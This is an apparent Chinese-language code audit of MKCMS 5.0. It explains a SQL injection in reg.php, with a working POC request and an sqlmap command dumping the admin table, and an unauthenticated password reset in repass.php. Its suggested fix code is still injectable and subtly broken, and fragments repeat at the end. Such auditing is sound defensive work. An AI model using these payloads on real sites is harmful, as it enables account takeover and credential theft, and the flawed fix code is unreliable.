MKCMS5.0 代码审计报告：前台SQL注入与任意用户密码重置漏洞分析<\/h1>

0x01 系统概述<\/h2>

MKCMS5.0是一款基于PHP+MYSQL开发的专业全自动采集电影网站源码，具有以下特点：<\/p>

无需授权上传直接使用<\/li>
自动更新电影内容，支持无人值守<\/li>
完整的会员影视中心<\/li>
后台可对接卡盟<\/li>

支持设置收费观看模式<\/li> <\/ul>

0x02 漏洞一：前台SQL注入<\/h2>

漏洞位置<\/h3>
`\/ucenter\/reg.php<\/code> 第7-19行<\/p>`

漏洞代码分析<\/h3>
if<\/span>(isset<\/span>($_POST['submit'<\/span>])){
<\/span><\/span>    $username =<\/span> stripslashes<\/span>(trim<\/span>($_POST['name'<\/span>]));
<\/span><\/span>    \/\/ 检测用户名是否存在
<\/span><\/span><\/span><\/span>    $query =<\/span> mysql_query<\/span>("select u_id from mkcms_user where u_name='<\/span>$username<\/span>'"<\/span>);
<\/span><\/span>    if<\/span>(mysql_fetch_array<\/span>($query)){
<\/span><\/span>        echo<\/span> '<script>alert("用户名已存在,请换个其他的用户名");window.history.go(-1);<\/script>'<\/span>;
<\/span><\/span>        exit<\/span>;
<\/span><\/span>    }
<\/span><\/span>    $result =<\/span> mysql_query<\/span>('select * from mkcms_user where u_email = "'<\/span>.<\/span>$_POST['email'<\/span>].<\/span>'"'<\/span>);
<\/span><\/span>    if<\/span>(mysql_fetch_array<\/span>($result)){
<\/span><\/span>        echo<\/span> '<script>alert("邮箱已存在,请换个其他的邮箱");window.history.go(-1);<\/script>'<\/span>;
<\/span><\/span>        exit<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞成因<\/h3>

$username<\/code>参数仅经过stripslashes()<\/code>和trim()<\/code>处理<\/li>
stripslashes()<\/code>函数会删除addslashes()<\/code>添加的反斜杠，但此处没有先使用addslashes()<\/code><\/li>
直接拼接用户输入到SQL语句中，导致SQL注入<\/li>
<\/ol>
漏洞利用方法<\/h3>

这是一个布尔盲注漏洞，通过判断返回结果(true\/false)来获取信息<\/li>
POC示例：<\/li>
<\/ol>
POST \/ucenter\/reg.php HTTP\/1.1
Host: 127.0.0.1
[...其他头部...]
Content-Length: 52
Connection: close

name=test' AND 1=1 AND 'inject'='inject&email=sss%40qq.com&password=ssssss&submit=
<\/code><\/pre>

使用sqlmap自动化利用：<\/li>
<\/ol>
sqlmap -r inject.txt -D mkcms -T mkcms_manager --dump
<\/span><\/span><\/code><\/pre>修复建议<\/h3>

对所有用户输入使用addslashes()<\/code>或更好的mysql_real_escape_string()<\/code>进行转义<\/li>
建议使用预处理语句(PDO)替代直接拼接SQL<\/li>
<\/ol>
0x03 漏洞二：任意用户密码重置<\/h2>
漏洞位置<\/h3>
\/ucenter\/repass.php<\/code> 第1-44行<\/p>
漏洞代码分析<\/h3>
if<\/span>(isset<\/span>($_POST['submit'<\/span>])){
<\/span><\/span>    $username =<\/span> stripslashes<\/span>(trim<\/span>($_POST['name'<\/span>]));
<\/span><\/span>    $email =<\/span> trim<\/span>($_POST['email'<\/span>]);
<\/span><\/span>    
<\/span><\/span>    \/\/ 检测用户名是否存在
<\/span><\/span><\/span><\/span>    $query =<\/span> mysql_query<\/span>("select u_id from mkcms_user where u_name='<\/span>$username<\/span>' and u_email='<\/span>$email<\/span>'"<\/span>);
<\/span><\/span>    if<\/span>(!!<\/span> $row =<\/span> mysql_fetch_array<\/span>($query)){
<\/span><\/span>        $_data['u_password'<\/span>] =<\/span> md5<\/span>(123456<\/span>);
<\/span><\/span>        $sql =<\/span> 'update mkcms_user set '<\/span>.<\/span>arrtoupdate<\/span>($_data).<\/span>' where u_name="'<\/span>.<\/span>$username.<\/span>'"'<\/span>;
<\/span><\/span>        if<\/span> (mysql_query<\/span>($sql)) {
<\/span><\/span>            $token =<\/span>$row['u_question'<\/span>];
<\/span><\/span>            include<\/span>("emailconfig.php"<\/span>);
<\/span><\/span>            \/\/ 邮件发送代码...
<\/span><\/span><\/span><\/span>            if<\/span>($rs==<\/span>true<\/span>){
<\/span><\/span>                echo<\/span> '<script>alert("请登录到您的邮箱查看您的密码!");window.history.go(-1);<\/script>'<\/span>;
<\/span><\/span>            }else<\/span>{
<\/span><\/span>                echo<\/span> "找回密码失败"<\/span>
<\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞成因<\/h3>

逻辑缺陷：程序先重置密码为123456，然后才发送邮件验证<\/li>
即使邮件发送失败，密码也已经被重置<\/li>
攻击者只需知道用户名和对应邮箱，即可重置该用户密码<\/li>
<\/ol>
漏洞利用方法<\/h3>

构造POST请求，提供目标用户名和邮箱<\/li>
系统会立即将密码重置为123456<\/li>
即使邮件发送失败，密码修改操作已经完成<\/li>
<\/ol>
修复建议<\/h3>

修改逻辑流程，先发送验证邮件，验证成功后再修改密码<\/li>
建议修复代码：<\/li>
<\/ol>
function<\/span> randomkeys<\/span>($length) {
<\/span><\/span>    $pattern =<\/span> '1234567890abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLOMNOPQRSTUVWXYZ'<\/span>;
<\/span><\/span>    for<\/span>($i=<\/span>0<\/span>;$i<<\/span>$length;$i++<\/span>) {
<\/span><\/span>        $key .=<\/span> $pattern{mt_rand<\/span>(0<\/span>,35<\/span>)};
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $key;
<\/span><\/span>};
<\/span><\/span>$repass =<\/span> randomkeys<\/span>(10<\/span>);
<\/span><\/span>
<\/span><\/span>if<\/span>(isset<\/span>($_POST['submit'<\/span>])){
<\/span><\/span>    $username =<\/span> stripslashes<\/span>(trim<\/span>($_POST['name'<\/span>]));
<\/span><\/span>    $email =<\/span> trim<\/span>($_POST['email'<\/span>]);
<\/span><\/span>    
<\/span><\/span>    $query =<\/span> mysql_query<\/span>("select u_id from mkcms_user where u_name='<\/span>$username<\/span>' and u_email='<\/span>$email<\/span>'"<\/span>);
<\/span><\/span>    if<\/span>(!!<\/span> $row =<\/span> mysql_fetch_array<\/span>($query)){
<\/span><\/span>        include<\/span>("emailconfig.php"<\/span>);
<\/span><\/span>        \/\/ 邮件发送代码...
<\/span><\/span><\/span><\/span>        if<\/span>($rs==<\/span>true<\/span>){
<\/span><\/span>            $_data['u_password'<\/span>] =<\/span> md5<\/span>($repass);
<\/span><\/span>            $sql =<\/span> 'update mkcms_user set '<\/span>.<\/span>arrtoupdate<\/span>($_data).<\/span>' where u_name="'<\/span>.<\/span>$username.<\/span>'"'<\/span>;
<\/span><\/span>            mysql_query<\/span>($sql);
<\/span><\/span>            echo<\/span> '<script>alert("请登录到您的邮箱查看您的密码!");window.history.go(-1);<\/script>'<\/span>;
<\/span><\/span>        }else<\/span>{
<\/span><\/span>            echo<\/span> "找回密码失败"<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>0x04 辅助工具<\/h2>
MySQLMonitor工具可用于监控SQL语句执行情况，帮助审计SQL注入漏洞：

https:\/\/github.com\/TheKingOfDuck\/MySQLMonitor<\/p>
0x05 总结<\/h2>

SQL注入漏洞<\/strong>：由于未正确过滤用户输入导致，建议使用预处理语句<\/li>
密码重置漏洞<\/strong>：由于逻辑流程错误导致，应先验证后修改<\/li>
两个漏洞都涉及用户认证系统，危害性较高<\/li>
建议对所有用户输入进行严格过滤和验证<\/li>
关键业务逻辑应增加二次验证机制<\/li>
<\/ol>
0x06 免责声明<\/h2>
本报告仅供技术交流使用，不得用于非法用途。在实际测试中，应事先获得系统所有者的授权。<\/p>

MKCMS5.0 代码审计报告：前台SQL注入与任意用户密码重置漏洞分析<\/h1>

0x02 漏洞一：前台SQL注入<\/h2>

漏洞位置<\/h3> \/ucenter\/reg.php<\/code> 第7-19行<\/p>

0x03 漏洞二：任意用户密码重置<\/h2>

漏洞位置<\/h3> \/ucenter\/repass.php<\/code> 第1-44行<\/p>

0x04 辅助工具<\/h2> MySQLMonitor工具可用于监控SQL语句执行情况，帮助审计SQL注入漏洞： https:\/\/github.com\/TheKingOfDuck\/MySQLMonitor<\/p>

0x06 免责声明<\/h2> 本报告仅供技术交流使用，不得用于非法用途。在实际测试中，应事先获得系统所有者的授权。<\/p>

漏洞位置<\/h3>
`\/ucenter\/reg.php<\/code> 第7-19行<\/p>`

漏洞位置<\/h3>
`\/ucenter\/repass.php<\/code> 第1-44行<\/p>`

0x04 辅助工具<\/h2>
MySQLMonitor工具可用于监控SQL语句执行情况，帮助审计SQL注入漏洞：
https:\/\/github.com\/TheKingOfDuck\/MySQLMonitor<\/p>

0x06 免责声明<\/h2>
本报告仅供技术交流使用，不得用于非法用途。在实际测试中，应事先获得系统所有者的授权。<\/p>